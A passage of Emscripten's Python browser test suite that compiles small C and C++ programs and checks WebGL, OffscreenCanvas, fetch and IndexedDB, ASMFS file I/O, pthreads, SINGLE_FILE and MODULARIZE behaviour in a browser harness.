def test_webgl_offscreen_canvas_only_in_pthread(self):
self.btest('gl_only_in_pthread.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'])
# Tests that rendering from client side memory without default-enabling extensions works.
@requires_graphics_hardware
def test_webgl_from_client_side_memory_without_default_enabled_extensions(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1', '-DDRAW_FROM_CLIENT_MEMORY=1', '-s', 'FULL_ES2=1'])
# Tests that -s OFFSCREEN_FRAMEBUFFER=1 rendering works.
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1'])
# Tests that VAOs can be used even if WebGL enableExtensionsByDefault is set to 0.
@requires_graphics_hardware
def test_webgl_vao_without_automatic_extensions(self):
self.btest('test_webgl_no_auto_init_extensions.c', '0', args=['-lGL', '-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=0'])
# Tests that offscreen framebuffer state restoration works
@requires_graphics_hardware
def test_webgl_offscreen_framebuffer_state_restoration(self):
for args in [
# full state restoration path on WebGL 1.0
['-s', 'USE_WEBGL2=0', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# VAO path on WebGL 1.0
['-s', 'USE_WEBGL2=0'],
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=0'],
# VAO path on WebGL 2.0
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-DTEST_REQUIRE_VAO=1'],
# full state restoration path on WebGL 2.0
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=1', '-s', 'OFFSCREEN_FRAMEBUFFER_FORBID_VAO_PATH=1'],
# blitFramebuffer path on WebGL 2.0 (falls back to VAO on Firefox < 67)
['-s', 'USE_WEBGL2=1', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'USE_WEBGL2=1'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS=1', '-s', 'OFFSCREENCANVAS_SUPPORT=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1']
if asyncify:
if not self.is_wasm_backend():
continue
# given the synchronous render loop here, asyncify is needed to see intermediate frames and the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD=1']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS=1', '-lGL', '-s', 'GL_DEBUG=1', '-s', 'DISABLE_DEPRECATED_FIND_EVENT_TARGET_BEHAVIOR=1']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
  # Tests the feature that the shell html page can preallocate the typed array and place it in Module.buffer before loading the script page.
# In this build mode, the -s TOTAL_MEMORY=xxx option will be ignored.
  # Preallocating the buffer in this way is asm.js only (wasm needs a Memory).
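  # (The custom shell is assumed to allocate the ArrayBuffer and assign it to
  # Module.buffer before the compiled script runs, which is why the command-line
  # TOTAL_MEMORY value has no effect.)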
@no_wasm_backend('asm.js feature')
def test_preallocated_heap(self):
self.btest('test_preallocated_heap.cpp', expected='1', args=['-s', 'WASM=0', '-s', 'TOTAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', path_from_root('tests', 'test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'] + arg,
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], also_asmjs=True)
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'TOTAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
  # In that case, append is implicitly assumed.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@no_wasm_backend("fetch API uses an asm.js based web worker to run synchronous XHRs and IDB operations")
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH=1', '-s', 'WASM=1', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['--std=c++11', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_fetch_idb_delete(self):
shutil.copyfile(path_from_root('tests', 'gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'FETCH=1', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
os.mkdir('dirrey')
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest('asmfs/hello_file.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(path_from_root('tests', 'asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest('asmfs/read_file_twice.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_fopen_write(self):
self.btest('asmfs/fopen_write.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_close(self):
self.btest('unistd/close.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_access(self):
self.btest('unistd/access.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest('unistd/unlink.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-DNO_SYMLINK=1'])
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_asmfs_relative_paths(self):
self.btest('asmfs/relative_paths.cpp', expected='0', args=['-s', 'ASMFS=1', '-s', 'WASM=0', '-s', 'USE_PTHREADS=1', '-s', 'FETCH_DEBUG=1'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3', '--separate-asm'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'USE_PTHREADS=1', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', path_from_root('tests', 'canvas_animate_resize_shell.html'), '--separate-asm', '-s', 'GL_DEBUG=1', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=MyModule', '--shell-file', path_from_root('tests', 'shell_that_launches_modularize.html')]]:
self.btest(path_from_root('tests', 'pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS=1'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@no_chrome('https://bugs.chromium.org/p/v8/issues/detail?id=9062')
@requires_threads
def test_pthread_growth_mainthread(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=32MB', '-s', 'WASM_MEM_MAX=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'MODULARIZE_INSTANCE=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests memory growth in a pthread.
@no_chrome('https://bugs.chromium.org/p/v8/issues/detail?id=9065')
@requires_threads
def test_pthread_growth(self):
def run(emcc_args=[]):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=32MB', '-s', 'WASM_MEM_MAX=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS=1'])
run(['-s', 'PROXY_TO_PTHREAD=1'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
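  # (main_js_as_blob_loader.html is assumed to fetch the generated .js, wrap it
  # in a Blob, and load it via URL.createObjectURL.)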
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
src = 'src.c'
create_test_file(src, self.with_report_result(open(path_from_root('tests', 'pthread', 'hello_thread.c')).read()))
self.compile_btest(['src.c', '-s', 'USE_PTHREADS=1', '-o', 'hello_thread_with_blob_url.js', '-s', 'WASM=0'])
shutil.copyfile(path_from_root('tests', 'pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
  # Tests that base64 utils work in a browser with no native atob function
def test_base64_atob_fallback(self):
opts = ['-s', 'SINGLE_FILE=1', '-s', 'WASM=1']
src = r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
REPORT_RESULT(0);
return 0;
}
'''
create_test_file('test.c', self.with_report_result(src))
# generate a dummy file
create_test_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file'] + opts)
create_test_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('emscripten_main_loop_setimmediate.cpp', '1', args=['-s', 'SINGLE_FILE=1', '-s', 'WASM=1'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE=1', '-s', 'ENVIRONMENT=web', '-O2', '--closure', '1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
for wasm_enabled in [True, False]:
args = ['src.cpp', '-o', 'test.js', '-s', 'SINGLE_FILE=1']
if wasm_enabled:
args += ['-s', 'WASM=1']
self.compile_btest(args)
create_test_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
create_test_file('src.cpp', self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
self.compile_btest(['src.cpp', '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE=1', '-s', 'WASM=1'])
create_test_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
def test_access_file_after_heap_resize(self):
create_test_file('test.txt', 'hello from file')
create_test_file('page.c', self.with_report_result(open(path_from_root('tests', 'access_file_after_heap_resize.c'), 'r').read()))
self.compile_btest(['page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation, letting us affect heap copying
# or lack thereof
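    # (--no-heap-copy is assumed to keep the packaged file data in its own typed
    # array rather than copying it into the Emscripten heap up front, which is
    # what makes it interesting to combine with memory growth.)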
for file_packager_args in [[], ['--no-heap-copy']]:
print(file_packager_args)
run_process([PYTHON, FILE_PACKAGER, 'data.js', '--preload', 'test.txt', '--js-output=' + 'data.js'] + file_packager_args)
self.compile_btest(['page.c', '-s', 'WASM=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM=1'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_test_file('main.cpp', self.with_report_result(r'''
int main() {
REPORT_RESULT(0);
return 0;
}
'''))
create_test_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(path_from_root('tests', 'pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS=1', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=["print"]'])
  # Tests that Emscripten-compiled applications can be run from a relative path in the browser that is different from the address of the current page
def test_browser_run_from_different_directory(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
self.compile_btest(['test.c', '-o', 'test.html', '-O3'])
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
for args, creations in [
(['-s', 'MODULARIZE=1'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
(['-s', 'MODULARIZE_INSTANCE=1'], ['']) # instance: no need to create anything
]:
print(args)
      # compile the code with the modularize feature enabled
self.compile_btest(['test.c', '-o', 'test.js', '-O3'] + args)
if not os.path.exists('subdir'):
os.mkdir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_test_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
  # we also eval the initial code, so currentScript is not present. That prevents us
  # from finding the file in a subdir, but here we at least check that we do not regress
  # compared to the normal case of finding it in the current dir.
def test_browser_modularize_no_current_script(self):
src = open(path_from_root('tests', 'browser_test_hello_world.c')).read()
create_test_file('test.c', self.with_report_result(src))
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE=1'], 'Module();'),
([], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
(['subdir'], ['-s', 'MODULARIZE=1'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE_INSTANCE=1'], ''),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
if not os.path.exists(filesystem_path):
os.makedirs(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_modularize_Module_input(self):
self.btest(path_from_root('tests', 'browser', 'modularize_Module_input.cpp'), '0', args=['--shell-file', path_from_root('tests', 'browser', 'modularize_Module_input.html'), '-s', 'MODULARIZE_INSTANCE=1'])
def test_emscripten_request_animation_frame(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(path_from_root('tests', 'emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
def test_emscripten_set_immediate(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(path_from_root('tests', 'emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(path_from_root('tests', 'emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(path_from_root('tests', 'emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-std=c++11', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(path_from_root('tests', 'emscripten_console_log.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(path_from_root('tests', 'emscripten_throw_number.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(path_from_root('tests', 'emscripten_throw_string.c'), '0', args=['--pre-js', path_from_root('tests', 'emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure', '1'])
  # Tests that it is possible to load two asm.js compiled programs on one page when both --separate-asm and MODULARIZE=1 are used, by assigning
  # the pages different asm module names to ensure they do not conflict when being XHRed in.
@no_wasm_backend('this tests asm.js support')
def test_two_separate_asm_files_on_same_page(self):
html_file = open('main.html', 'w')
html_file.write(open(path_from_root('tests', 'two_separate_asm_files.html')).read().replace('localhost:8888', 'localhost:%s' % self.port))
html_file.close()
cmd = [PYTHON, EMCC, path_from_root('tests', 'modularize_separate_asm.c'), '-o', 'page1.js', '-s', 'WASM=0', '--separate-asm', '-s', 'MODULARIZE=1', '-s', 'EXPORT_NAME=Module1', '-s', 'SEPARATE_ASM_MODULE_NAME=ModuleForPage1["asm"]']
print(cmd)
subprocess.check_call(cmd)
